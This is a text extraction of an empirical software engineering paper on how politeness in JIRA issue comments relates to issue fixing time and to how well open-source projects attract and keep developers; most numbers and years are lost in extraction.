clarify why not? the question is whether this is redundant with cascading, so comparisons are certainly relevant, no? no comments politeness given some texts, the tool developed by danescu-niculescu-mizil et al. ( ) calculates the politeness of its sentences providing one of two possible labels: polite or impolite as result. impolite. table shows some examples of polite and impolite comments as classified by the tool. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of timeline for jira issue. we evaluated the percentage of polite comments per month considering all comments posted in a certain month. for each comment we assigned a value according to the following rules: • value of + for those comments marked as polite by the tool. • value of � for those comments marked as impolite. finally, we calculated the percentage of polite comments for a certain month. we analyzed the politeness of about k comments. issue politeness the next step was to infer the politeness of issues from the knowledge of comments politeness. we grouped issues together as follows: • we first divided comments in polite sets: polite, impolite; • we divided issues in three sets: polite issues (commented only with polite comments), impolite issues (commented only by impolite comments) and mixed issue (commented with both polite and impolite comments). for each issue we evaluated the politeness expressed in its comments and we then divided issues in three groups: polite issues containing polite comments, impolite issues containing impolite comments and mixed issues containing both polite and impolite comments. our dataset contains in total , issues, . % ( , ) of the total were classified as polite, . % ( , ) classified as impolite, . % ( , ) classified as mixed. for each of this three groups of issues we evaluated the issue fixing time as the difference between resolution and creation time. figure shows the typical issue timeline in jira: • tcr represents the time when an issue is created. • tcl represents the time when an issue is closed. • ta represents the time when an issue is assigned to a developer. • ts is the time when a developer subscribes to an issue that has been assigned to them. to infer the issue fixing time (abbreviated as ift), we used the approach proposed by murgia et al. ( a). we computed the time interval between the last time an issue had been closed and the last time it had been subscribed to by an assignee. attractiveness our research focuses around the concepts developed by yamashita et al. ( ) and yamashita et al. ( ) who introduced the concepts of magnetism and stickiness for destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we consider as active all developers who posted/commented/resolved/modified an issue during the observed time (from dev_ to dev_ ). figure example of magnetism and stickiness metrics computation in . a software project. a project is classified as magnetic if it has the ability to attract new developers over time. stickiness is the ability of a project to keep its developers over time. we measured these two metrics by considering the period of observation of one year. figure shows an example of the evaluation of magnetism and stickiness metrics. in this example, we were interested in calculating the value of magnetism and stickiness for . from to , we had a total of active developers. in , there were seven active developers and of them (highlighted with black heads) were new. only (highlighted with grey heads) of the seven active developers in were also active in . we can then calculate the magnetism and stickiness as follows: • magnetism is the fraction of new active developers during the observed time interval, in our example / (dev_ and dev_ were active in but not in ). • stickiness is the fraction of active developers that were also active during next time interval, in our example / (dev_ , dev_ , dev_ were active in and in ). data analysis to perform statistical testing, filter the data and produce the visualisation of the results, we used scikit-learn (http://scikit-learn.org/stable/) for rq , and the r projects for statistical computing (r development core team, ) for the other rqs. to facilitate replication of our study, we have created a replication package (https://bitbucket.org/giuseppedestefanis/ peerjcs_replicationpackage) which contains the dataset, the tool used to detect politeness and the r and python scripts for performing the statistical analysis. results does a relationship exist between politeness and issues fixing time? motivation. murgia et al. ( a) demonstrated the influence of maintenance type on the issue fixing time, while zhang, gong & versteeg ( ) developed a prediction model for bug fixing time for commercial software. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://scikit-learn.org/stable/ https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage http://dx.doi.org/ . /peerj-cs. in another study, zhang et al. ( ) analyzed the interval between bug assignment and the time when bug fixing starts (bugs are classified as a type of issue in jira). after a bug being reported and assigned, some developers will immediately start fixing the bug while others will start bug fixing after a long period. the authors explored the delays of developers empirically analyzing three open source software systems. they studied factors affecting bug fixing time along three dimensions (bug reports, source code involved in the fix and code changes that are required to fix the bug) and compared such factors using logistic regression models. the most influential factors on bug fixing appeared to be the severity of a bug, its description and comments and operating system where a bug was found. hence, there are indeed many factors able to influence bugs fixing time and issues fixing time; in this case, we were interested in finding out if politeness expressed by developers in comments had an influence on issue fixing time. to detect differences among the fixing time of polite, impolite and mixed issues, we used the kruskal–wallis test. such a test is non parametric and unpaired (siegel, ; kruskal & wallis, ; weiss et al., ). the test can be used with no restrictions or hypotheses on the statistical distribution of the sample populations. the test is suitable for comparing differences among the medians of two or more populations when their distributions are not gaussian. we grouped all the issues (by category) of all the projects contained in our corpus and then we tested the null hypothesis h : the three distributions of issue fixing time are equal for the three typologies of considered issues (polite, impolite, mixed). the outcome of the kruskal–wallis test is a p-value p < � indicating that the three distributions are statistically different. figure shows the box-plot of the issues fixing time for the three groups of issues considered (polite, impolite and mixed) for all the issues analysed. the issues fixing time is expressed in hours on a logarithmic scale. the median of the issue fixing time for polite issues is shorter than that for impolite and mixed issues, while the median for impolite issues is shorter than the one for mixed issues. figure also shows that the percentage of impolite issues is the highest ( . %), followed by mixed issues ( . %) and then polite issue ( . %). figures and show the boxplots of the issue fixing time when considering single projects. we considered the four projects (hadoop hdfs, derby, lucene-core, hadoop map/reduce) with the highest number of comments in our corpus as examples. for visualising the boxplots of figs. and , we grouped the issues by project and then by category. the results obtained with all the issues grouped together (without distinguishing for project) are confirmed also with these four examples. the median of the issues for polite issues is lower than the other two medians, and also in this cases issues with mixed polite and impolite comments have a longer issue fixing time than issues with impolite comments. findings. issue fixing time for polite issues is shorter than issue fixing time for impolite and mixed issues. does politeness among developers a�ect the attractiveness of a project? motivation. magnetism and stickiness are two interesting metrics able to describe the general health of a project; namely, if a project is able to attract new developers and to destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure box-plot of the fixing-time expressed in hours. the number in parentheses next to issue group indicates the percentage of issues. figure box-plot of the fixing-time expressed in hours for single projects. the number in parentheses next to polite/impolite indicates the per- centage of impolite and polite issues. keep them over time we can then conclude that the project is healthy. on the other hand, if a project is not magnetic and is not sticky we can conclude that the project is losing developers and is not attracting new developers over time. although there may be many factors influencing magnetism and stickiness, we were interested in analysing the correlation between politeness expressed by developers in their comments and these two metrics. to detect if there was a direct correlation between magnetism and stickiness of a project and politeness, we considered an observation time of one month. during this time interval destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure box-plot of the fixing-time expressed in hours for single projects. the number in parentheses next to polite/impolite indicates the per- centage of impolite and polite issues. we measured magnetism, stickiness and the percentage of polite comments. since we had no evidence that the politeness in the observed time could affect magnetism and stickiness in the same time interval or in the following observation time, we evaluated a cross-correlation coefficient. to study the cross correlation, we first studied the time series for stationarity. a time series xt (t = , ...) is considered to be stationary if its statistical properties (autocorrelation, variance, expectation) do not vary with time (priestley, ; priestley, ; hamilton, ). time series stationarity is a condition required for calculating the most common correlation coefficient. however, it is still possible to study cross-correlation between time series which are not stationary (kri≤toufek, ). we used the r package fpp (https://cran.r-project.org/package=fpp) and we applied: • ljung–box test (box & pierce, ; ljung & box, ): this test for stationarity confirms independence of increments, where rejection of the null hypothesis h indicates stationarity (the null hypothesis h is that the data are non-stationary); • augmented dickey-fuller (adf) t-statistic test (said & dickey, ; diebold & rudebusch, ; banerjee et al., ): in the augmented dickey-fuller (adf) t-statistic test the null hypothesis h is that the data are non-stationary (small p-values (e.g., less than . ) suggest that the time-series is stationary). • kwiatkowski-phillips–schmidt–shin test (kpss) (kwiatkowski et al., ): this test reverses the hypotheses, hence the null-hypothesis h is that the time-series is stationary. small p-values (e.g., less than . ) suggest that the time-series is not stationary. we decided to proceed using the results obtained from the three tests used for checking stationarity of a time series and then consider the worst case scenario (e.g., even if only one test out of three indicated rejection of the hypothesis of stationarity for a given time series, we considered that time series as non stationary). the results of the three tests are shown in table . the cells in grey indicate that the p-value for the corresponding test is below % (our cutoff for significance), thus we infer in these cases that the test indicates stationarity destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/package=fpp http://dx.doi.org/ . /peerj-cs. table p-value results for stationarity tests (ljung–box, augmented dickey-fuller, kpss). project politeness magnetism stickiness hbase . . . . . . . . . hadoop c. . . . . . . . e- . . derby . e- . . . . . . . . lucene c. . . . . . . . e- . . hadoop hdfs . . . . . . . . . cassandra . . . . . . . . . solr . . . . . . e- . . . hive . e- . . . . . . . . hadoop mr . e- . . . . . . e- . . harmony . . . . . . . e- . . ofbiz . . . . . . . e- . . infrastructure . . . . . . . . . camel . . . . . . . e- . . zookeeper . . . . . . . . . geoserver . . . . . . . . . geronimo . . . . . . . e- . . groovy . e- . . . . . . e- . . hibernate orm . e- . . . . . . e- . . jboss . . . . . . . e- . . jruby . . . . . . . . . pig . e- . . . . . . e- . . wicket . . . . . . . e- . . (on the contrary, cells in white indicate that the p-value for the corresponding test is above %). for example, for the percentage of polite comments time series of hbase (row , first three cells), we have that the first two tests (box-ljung and augmented dickey-fuller) suggest stationarity, while the third test (kpss) rejects the hypothesis of stationarity. for the majority of the cases, the tests provides discordant results. only for magnetism for infrastructure (row ) and geoserver (row ) there is agreement among the three tests. thus, we considered all the time series in table , except for the cases mentioned before, being not stationary. table shows the results obtained applying the algorithm illustrated in kri≤toufek ( ) (http://stats.stackexchange.com/questions/ /code- for-detrended-cross-correlation-in-r). for the majority of the cases there is a weak positive correlation between politeness and magnetism ( projects out ) and politeness and stickiness ( projects out ). we also calculated the cross correlation (using the ccf function in r) after applying time series differencing to transform time series that were not stationary in table into stationary. the d differencing operator applied to a time series k is to create a new series kn whose value at time t is the difference between k(t +t ) and k(t). this method is useful for removing cycles and trends. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://stats.stackexchange.com/questions/ /code-for-detrended-cross-correlation-in-r http://stats.stackexchange.com/questions/ /code-for-detrended-cross-correlation-in-r http://dx.doi.org/ . /peerj-cs. table cross-correlation for not stationary series. project politeness-magnetism politeness-stickiness hbase . � . hadoop common . . derby � . . lucene core . . hadoop hdfs � . . cassandra . � . solr � . . hive . . hadoop map/reduce � . . harmony . . ofbiz . . infrastructure � . . camel . . zookeeper � . � . geoserver . � . geronimo . . groovy . � . hibernate orm . � . jboss � . � . jruby � . � . pig . . wicket . � . figure differencing time-series. as an example, fig. a shows the magnetism time-series for lucene core. from table , row , we can see that the time series is not stationary, since all the three test failed in proving stationarity. by applying the differencing operator (first differencing), we obtain the new time-series in fig. b. the new time-series in fig. b is stationary; all the three tests provide the same indication for stationarity (box-ljung: p � value = . e � , augmented dickey-fuller: destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cross-correlation—lucene core. p�value = . , kpss: p�value = . ) and the plot appears roughly horizontal (the visual inspection is a practical rule of thumb which can help when evaluating a time-series for stationarity). if the time-series under study are stationary, it is possible to calculate the cross correlation. the cross correlation function (ccf) is defined as the set of correlations (height of the vertical line segments in fig. ) between two time series xt + h and yt for lags h = ,± ,± ,.... a negative value for h represents a correlation between the x-series at a time before t and the y-series at time t. for example, if the lag h = � , then the cross correlation value would give the correlation between xt � and yt . on the contrary, negative lines correspond to anti-correlated events. the ccf helps to identify lags of xt that could be predictors of the yt series. • when h < (left side of plots in figs. a and b), x leads y. • when h > (right side of plots in figs. a and b), y leads x. table shows the maximum value of the cross-correlation coefficient between the percentage of polite comments and magnetism and the percentage of polite comments and stickiness and the lag (or lags) in which the maximum value occurs. the values are calculated using the r function ccf . a negative lag x means that the current values of stickiness are likely to be higher, if x month before the percentage of polite comments was higher. on the other hand, a positive lag z means that a current higher percentage of polite comments is linked with higher magnetism z months later. for both magnetism and stickiness, we observe that a positive maximum correlation exists. the difference sin lags presented in table could be explained looking at the composition of our corpus. we selected the projects with a higher number of comments from jira, regardless of domain, history and/or programming language used. additionally, there are systems which are younger than others and, as a consequence, the time series may have different lengths. findings. magnetism and stickiness are positively correlated with the percentage of polite comments. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table politeness vs magnet and sticky cross-correlation coefficient. project pol vs mag lag pol vs stick lag hbase . � , . hadoop common . � . derby . . � lucene core . � . � hadoop hdfs . . � cassandra . . solr . � . hive . � . � hadoop map/reduce . . harmony . � . ofbiz . . � infrastructure . . � camel . � . � ,- , zookeeper . . � geoserver . . � ,� geronimo . . groovy . . jboss . . hibernate orm . . � jruby . . � pig . . , wicket . � . does the percentage of polite comments vary over time? motivation. politeness has an influence on the productivity of a team (ortu et al., b; ortu et al., a; ortu et al., c). thus, it is interesting to understand if there are periods of time in which the level of politeness decreases (potentially affecting the productivity of a team). we calculated the level of politeness for any given issue and then plotted the percentage of polite comments per month grouping issues per project. for each project considered in this study, the percentage of polite comments over time can be seen as time series, hence we performed tests for randomness and seasonality to understand the nature of politeness time series. a time series is considered random if it consists of independent values from the same distribution. we used the bartels test (bartels, ) for studying randomness (brockwell & davis, ) and the results from the augmented dickey-fuller test and kpss test from ‘does politeness among developers affect the attractiveness of a project?’ for studying seasonality. we used the r package randtest (https://cran.r-project.org/web/packages/randtests/randtests.pdf) and we applied: • bartels test: in this test, the null hypothesis h of randomness is tested against non randomness. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/randtests/randtests.pdf http://dx.doi.org/ . /peerj-cs. table randomness and seasonality test results for politeness. randomness seasonality project bartels-rank p-value aug. d-f p-value kpss hbase . . . hadoop common . e- . . derby . e- . . lucene core . . . hadoop hdfs . e- . . cassandra . . . solr . . . hive . e- . . hadoop map/reduce . . . harmony . . . ofbiz . . . infrastructure . . . camel . e- . . zookeeper . . . geoserver . . . geronimo . . . groovy . . . hibernate orm . . . jboss . . . jruby . . . pig . e- . . wicket . . . for studying the seasonality of the percentage of polite comments time series, we considered the results (from ‘does politeness among developers affect the attractiveness of a project?’) of the following tests: • augmented dickey fuller test: the null hypothesis h is that the data are non-stationary and non-seasonal; • kwiatkowski-phillips–schmidt–shin (kpss) test: the null hypothesis h is that the data are stationary and non-seasonal. the results of the tests are shown in table . for randomness, the cells in grey indicate that the p-value for the corresponding test is higher than % (our cutoff for significance), thus we infer in these cases that the test indicates randomness (null hypothesis h of randomness). on the contrary, cells in white indicate that the p-value for the corresponding test is lower than %. in the majority of the cases ( out ), the percentage of polite comments time series were not random. for seasonality, the cells in grey indicate that the p-value for the corresponding test is less than % (our cutoff for significance), thus we infer in these cases that the test rejects the null hypothesis h of non-seasonality. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table shows that for the augmented dickey fuller test, projects (hbase, derby, lucene core, cassandra, harmony, ofbiz, infrastructure, camel, geoserver, geronimo, groovy, jboss) have a percentage of polite comments time series which presents seasonality, while time series are not seasonal. for the kpss test, the null hypothesis of non- seasonality is rejected for time series (out of ). it is interesting to note that there are variations in the percentage of polite comments over time. this is by no means a representation of a time dynamics, but simply the representation of random variation of the percentage of polite comments over time. cassandra and ofbiz present seasonality (table ) and fig. shows the seasonal component determined using the stl function (https://stat.ethz.ch/r-manual/r-devel/library/stats/html/stl.html) in r. in cassandra, fig. (a), and ofbiz, fig. (b), we see how the percentage of polite comments decreases for some time interval and increases for some others. it is also possible to analyse the percentage of polite comments trend, while for cassandra the trend is increasing starting from the year , for ofbiz the trend is decreasing. findings. the percentage of polite comments does vary over time and in some cases it changes from lower percentage of polite comments to higher percentage of polite comments from two consecutive observation intervals. this fact could be related to the composition of our corpus. we considered only open source systems, hence there are no strict deadlines or particular busy days (such as fridays, as suggested by ëliwerski, zimmermann & zeller ( )). how does politeness vary with respect to jira maintenance types and issue priorities? motivation. understanding which typology of issue attracts more impolite comments could help both managers and developers better understand the development process and take action to better manage the distribution of issues within development teams. a classification of the type of issues, is provided on the jira wiki (https: //cwiki.apache.org/confluence/display/flume/classification+of+jira+issues). the following list gives a brief introduction: • bug: this type of issue indicates a defect in the source code, such as logic errors, out-of-memory errors, memory leaks and run-time errors. any failure of the product to perform as expected and any other unexpected or unwanted behaviour can be registered as type bug. • subtask: this type of issue indicates that a task must be completed as an element of a larger and more complex task. subtask issues are useful for dividing a parent issue into a number of smaller tasks, more manageable units that can be assigned and tracked separately. • task: this type of issue indicates a task that it is compulsory to complete. • improvement: this type of issue indicates an improvement or enhancement to an existing feature of the system. • new feature: this type of issue indicates a new feature of the product yet to be developed. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://stat.ethz.ch/r-manual/r-devel/library/stats/html/stl.html https://cwiki.apache.org/confluence/display/flume/classification+of+jira+issues https://cwiki.apache.org/confluence/display/flume/classification+of+jira+issues http://dx.doi.org/ . /peerj-cs. figure time series decomposition. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table maintenance statistics. type impolite polite bug , , sub-task , , task , , improvement , , new feature , , wish test new jira project brainstorming umbrella table priority statistics. priotity impolite polite blocker , , critical , , major , , minor , , optional trivial , , • wish: this type of issue is used to track general wishlist items, which could be classified as new features or improvements for the system under development. • test: this type of issue can be used to track a new unit or integration test. • new jira project: this type of issue indicates the request for a new jira project to be set up. • brainstorming: this type of issue is more suitable for items in their early stage of formation not yet mature enough to be labelled as a task or new feature. it provides a bucket where thoughts and ideas from interested parties can be recorded as the discussion and exchange of ideas progresses. once a resolution is made, a task can be created with all the details defined during the brainstorming phase. • umbrella: this type of issue is an overarching type comprised of one or more sub-tasks. tables and provide information about the absolute number of issues (maintenance e priority) in our corpus. to detect the level of politeness for each category of issue, we grouped the issue comments for type of maintenance and priority. to justify claims such as ‘‘issues of type a tend to have more polite comments than issues of type b’’, we used the multiple contrast test procedure (konietschke, hothorn & brunner, ) using a % error rate. instead of following a classical two-step approach in which a global null hypothesis is tested to begin with, and as a second step multiple destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table maintenance—significant results. pair lower upper p-value improvement—bug . . . e– new feature—bug . . . e– new feature—improvement . . . e– task—improvement � . � . . e– sub-task—new feature � . � . . e– task—new feature � . � . . e– test—new feature � . � . . e– wish—new feature � . � . . e– task—sub-task � . � . . e– test—task . . . e– comparisons are used to test sub-hypotheses related to each pair of groups, to answer our research question, we used the tukey’s test (tukey, ) which is a single-step multiple comparison procedure and statistical test. to visualize the results obtained from the multiple contrast test procedure, we used the t⇠ -graph presented by vasilescu et al. ( a). this visual comparison of multiple distributions using t⇠-graphs provides an immediate understanding of groups located in higher positions in the graph, i.e., issue categories with higher politeness, while groups located in lower positions in the graph are related to issue categories with lower politeness. other studies related to the application of t-graphs can be found in vasilescu, filkov & serebrenik ( ) and vasilescu et al. ( b). the approach used to build a t⇠ -graph is the following (cf. vasilescu et al. ( a)): • for each pair of groups it is necessary to analyse the % confidence interval to test if the corresponding null sub-hypothesis can be rejected; • if the lower boundary of the interval is greater than zero for groups a and b, we conclude that the metric value is higher in a than in b; • if the upper boundary of the interval is less than zero for groups a and b, we conclude that the metric value is lower in a than in b; • if the lower boundary of the interval is less than zero and the upper boundary is greater than zero, we conclude that the data does not provide enough evidence to reject the null hypothesis. • based on the results of the comparisons we construct the graph with nodes being groups and containing edges (a, b) if the metric value is higher in a than in b. the result of the multiple contrast test procedure are presented in tables and . we used the mctp function for the tukey’s test, from the nparcomp r package (https://cran.r-project.org/web/packages/nparcomp/nparcomp.pdf) to obtain the tables. table summarises the significant results which we used to build a t⇠ -graph. for the category brainstorming, the upper boundary of the interval is less than zero and the upper boundary is greater than zero. in this situation the data does not provide enough evidence destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/nparcomp/nparcomp.pdf http://dx.doi.org/ . /peerj-cs. figure t⇠ -graph for issue maintenance. table issue priority classification. pair lower upper p-value critical—blocker � . . . major—blocker � . � . minor—blocker � . � . trivial—blocker � . � . major—critical � . � . minor—critical � . � . trivial—critical � . � . minor—major � . � . trivial—major � . � . trivial—minor � . � . and we cannot conclude that, for example, brainstorming issue are more (or less) polite the bug issues. same thing happens for the category umbrella and new jira project. figure shows the t⇠ -graph resulting from the values in table . the category new feature is more polite than test, sub-task, improvement and wish; test, sub-task and improvement are more polite than task; improvement are more polite than bug. issues with maintenance bug are related to defects and software failures. this category presents the lower politeness. issues with maintenance new feature are proposals made by developers and it is interesting to see that when proposing something new, developers tend to be more polite. issues on jira are also classified considering the level of priority, as major, minor, blocker (e.g., an issue which blocks development and/or testing work), critical and trivial. table shows the results of the multiple contrast test procedure for the different groups of issue priority. figure shows the associated t⇠ -graph. blocker and critical issues are more polite than major, minor and trivial issues. major issues are more polite than minor and trivial, while minor are more polite than trivial. trivial issues are characterised by lower politeness. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure t⇠ -graph for issue priority. findings. comments related to issues with maintenance bug, priority minor and trivial, tended to have a lower politeness. issues with maintenance new feature, priority blocker and critical, tended to have a higher politeness. discussion software development, as well as other fields, is an activity organised around team- based environments. the implementation of team structures is not simple and does not necessarily result in success, because it is not enough just to put people together in teams and to presume that everybody knows or agrees on what to do (allen & hecht, ). people working together apply different personal assumptions and interpretations to their work tasks (keyton & beck, ). hence, conflicts within teams are possible. conflicts affect teams’ productivity and team leaders are certainly interested in knowing how to prevent, destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. avoid, or, in the worst case, manage conflicts which might occur. in this paper, we presented an analysis about the links between politeness and productivity of developers involved in a project. politeness is a factor that certainly helps in diminishing conflict and friction between people. the findings of this study contribute in highlighting the importance and the impact of the psychological state of a developer on the software production process. we started the paper by proposing that politeness information mined from software repositories like issue repositories could offer a way to investigate productivity during the software development process. we showed that issue fixing time for polite issues was shorter than issue fixing time for impolite and mixed-issues. this result matches common sense; if someone is asked to accomplish a task in a polite way, there is higher possibility for a relaxed collaboration and faster results. on the other hand, impolite requests can easily generate discomfort, stress and burnout, often negatively impacting the actual time taken to complete a given task. surprisingly, mixed issues (commented with both polite and impolite comments) presented longer fixing time than impolite issues. the mixed interaction ‘polite-impolite’ between developers could explain this fact. ortu et al. ( ) showed that when in the presence of impolite or negative comments, the probability of the next comment being impolite or negative was % and %, respectively. hence part of the longer time could be spent in trying to shift the exchange of comments toward a (more) polite level. for example, in a small study of a single project with two deadlines (guzman, b), the authors find that, as deadlines came closer, more and longer emails were exchanged with higher emotional intensity. the lower fixing time for impolite issues (compared to the fixing time of mixed issues) could also be related to the fact that developers (especially newcomers) being addressed with impolite comments can react faster because they feel emotionally pushed and want to show (to the community) that they are able to accomplish a task. as a second point, we showed that a positive correlation existed between the percentage of polite comments and magnetism and stickiness of a project. for each project in the corpus, we first calculated the percentage of polite comments per month and the value of magnetism and stickiness, generating three time series. we studied each time series for stationarity and then performed correlation analysis. we found that the percentage of polite comments is, for the majority of the project in our corpus, positive correlated with magnetism and stickiness. however, we need to point out that the first cross correlation analysis performed for the non-stationary series presented weak correlation values (< . ). higher correlation values were found after the cross correlation analysis of the stationary series (after differencing). the attractiveness of a project is indeed a complex phenomenon and there are different confounding factors (fame and importance of the project could be perceived also as a status-symbol, e.g., being part of the linux developers community) of which politeness among developers can be part of. further analysis on a larger corpus of projects are required. our findings highlight the fact that politeness might be a factor affecting the attractiveness of a project. third, we found that the percentage of polite comments over time was (for the majority of the projects in our corpus) seasonal and not random. this is an interesting (and somewhat expected) fact that could help managers and developers in better understanding destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the development process. further experiments are required to better analyse the links between seasonality and deadlines that developers face during the development phases. higher workload could lead to lower politeness, while normal activities can be linked with higher politeness. fourth, we studied how politeness varied with respect to jira maintenance types and issue priorities. again, the results match common sense. bug issues maintenance were those with lower politeness. when something is broken and needs to be fixed, the situation is less attractive and could generate impolite reactions. on the contrary, new feature issues maintenance were the ones with higher politeness; those kind of issues indicate a new feature yet to be developed, hence, there might be higher enthusiasm among developers (a developer can be the first one who started working for a new feature; the level of freedom felt for the task can be higher leading to higher politeness) when dealing with such issues. regarding issue priority, critical and blocker issues were the categories with higher politeness, while trivial issues were those characterised by lower politeness. again, this is what one would expect, since critical issues are both important and challenging, while trivial issues might be related to minor programming mistakes and/or poor knowledge of programming practices knowing when lower politeness will occur can help managers in taking actions aimed at keeping the general mood high and relaxed, lowering and preventing conflicts, obtaining higher productivity as a result. the results presented in this study can be also helpful when defining a team of developers. knowing the profile (from a politeness point of view) of the developers can provide hints for creating balanced teams. a jira plug-in able to present the politeness level of the communication flow in a graphical way (e.g., cockpit view) could help both developers and managers in constantly monitoring the general mood of the developers working for a company or for a project (in the case of open source collaboration paradigm). threats to validity threats to external validity correspond to the generalisation of our results (campbell & stanley, ). in this study, we analysed comments from issue reports from open source projects. our results cannot be representative of all environments or programming languages, we considered only open-source systems and this could affect the generality of the study. commercial software is usually developed using different platforms and technologies, by developers with different knowledge and background, with strict deadlines and cost limitations. replication of this work on other open source systems and on commercial projects are needed to confirm our findings. also, the politeness tool can be subject to bias due the domain used to train the machine learning classifier. threats to internal validity concern confounding factors that can influence the obtained results. based on empirical evidence, we suppose a relationship between the emotional state of developers and what they write in issue reports (pang & lee, ). since the main goal of developer communication is the sharing of information, the consequence of removing or camouflaging emotions may make comments less meaningful and cause misunderstanding. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this work is focused on sentences written by developers for developers. to illustrate the influence of these comments, it is important to understand the language used by developers. we believe that the tool used for measuring politeness danescu-niculescu-mizil et al. ( ) is valid in the software engineering domain, since the developers also used requests posted on stack overflow to train the classifier. the comments used in this study were collected over an extended period from developers unaware of being monitored. for this reason, we are confident that the emotions we analyzed were genuine. we do not claim any causality between politeness and the issue resolution time, but we built an explanatory model to understand the characteristics of issues with short and long fixing time. confounds could have affected validity of the results for rq about lower issue fixing time for polite and mixed issues. the number of developers involved in discussing issues might differ, as well as severity and complexity of an issue under analysis. another threat to validity is related to classification of jira issue types. as highlighted by herzig, just & zeller ( ) the categorisation of issue reports is dependent on the perspective of the observer. this fact could affect the results obtained for research question . threats to construct validity focus on how accurately the observations describe the phenomena of interest. the detection of emotions from issue reports presents difficulties due to vagueness and subjectivity. the politeness measures are approximated and cannot perfectly identify the precise context, given the challenges of natural language and subtle phenomena like sarcasm. conclusions and future work software engineers have been trying to measure software to gain quantitative insights into its properties and quality since its inception. in this paper, we present the results about politeness and attractiveness on open-source software projects developed using the agile board of the jira repository. our results show that the level of politeness in the communication process among developers does have an effect on both the time required to fix issues and the attractiveness of the project to both active and potential developers. the more polite developers were, the less time it took to fix an issue. in the majority of cases, the more the developers wanted to be part of project, the more they were willing to continue working on the project over time. this work is a starting point and further research on a larger number of projects is needed to validate our findings especially, considering proprietary software developed by companies, different programming languages and different dimension. the development of proprietary software follows different dynamics (e.g., strict deadlines and given budget) and this fact could lead to different results. we started the development of an application which will be able to automatically analyse all the comments on a issue tracking systems (as we have done for this paper) and will provide reports and data to managers, team-leaders and/or developers interested in understanding the health of a project from a ‘‘mood’’ point of view. the takeaway message is that politeness can only have a positive effect on a project and on the development process. destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements the authors would like to thank the anonymous reviewers for their valuable comments and suggestions to improve the quality of the paper. additional information and declarations funding the research presented in this paper was partly funded by the engineering and physical sciences research council (epsrc) of the uk under grant ref: ep/m / . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: engineering and physical sciences research council (epsrc): ep/m / . competing interests the authors declare there are no competing interests. author contributions • giuseppe destefanis, marco ortu and steve counsell conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • stephen swift performed the experiments, analyzed the data, contributed reagents/ma- terials/analysis tools, performed the computation work, reviewed drafts of the paper. • michele marchesi contributed reagents/materials/analysis tools, reviewed drafts of the paper. • roberto tonelli performed the experiments, contributed reagents/materials/analysis tools, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: we used a public dataset available at http://openscience.us/repo/social-analysis/social- aspects.html, and all the scripts we prepared (along with the raw data) can be found at bitbucket: https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ references acuña st, gómez m, juristo n. . towards understanding the relationship between team climate and software quality—a quasi-experimental study. empirical software engineering ( ): – doi . /s - - - . destefanis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://openscience.us/repo/social-analysis/social-aspects.html http://openscience.us/repo/social-analysis/social-aspects.html https://bitbucket.org/giuseppedestefanis/peerjcs_replicationpackage/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. allen nj, hecht td. . the ‘romance of teams’: toward an understanding of its psychological underpinnings and implications. journal of occupational and orga- nizational psychology ( ): – doi . / . amabile t, barsade sg, mueller js, staw bm. . affect and creativity at work. administrative science quarterly ( ): – doi . /asqu. . . . . banerjee a, dolado jj, galbraith jw, hendry d, et al. . co-integration, error correction, and the econometric analysis of non-stationary data. oup catalogue. bartels r. . the rank version of von neumann’s ratio test for randomness. journal of the american statistical association ( ): – doi . / . . . bazelli b, hindle a, stroulia e. . on the personality traits of stack overflow users. in: software maintenance (icsm), th ieee international conference on. piscataway: ieee, – . beck k, beedle m, van bennekum a, cockburn a, cunningham w, fowler m, grenning j, highsmith j, hunt a, jeffries r, kern j. . manifesto for agile software development. available at http://www.agilemanifesto.org. box ge, pierce da. . distribution of residual autocorrelations in autoregressive- integrated moving average time series models. journal of the american statistical association ( ): – doi . / . . . brief ap, weiss hm. . organizational behavior: affect in the workplace. annual review of psychology ( ): – doi . /annurev.psych. . . . brockwell pj, davis ra. . introduction to time series and forecasting. new york: springer 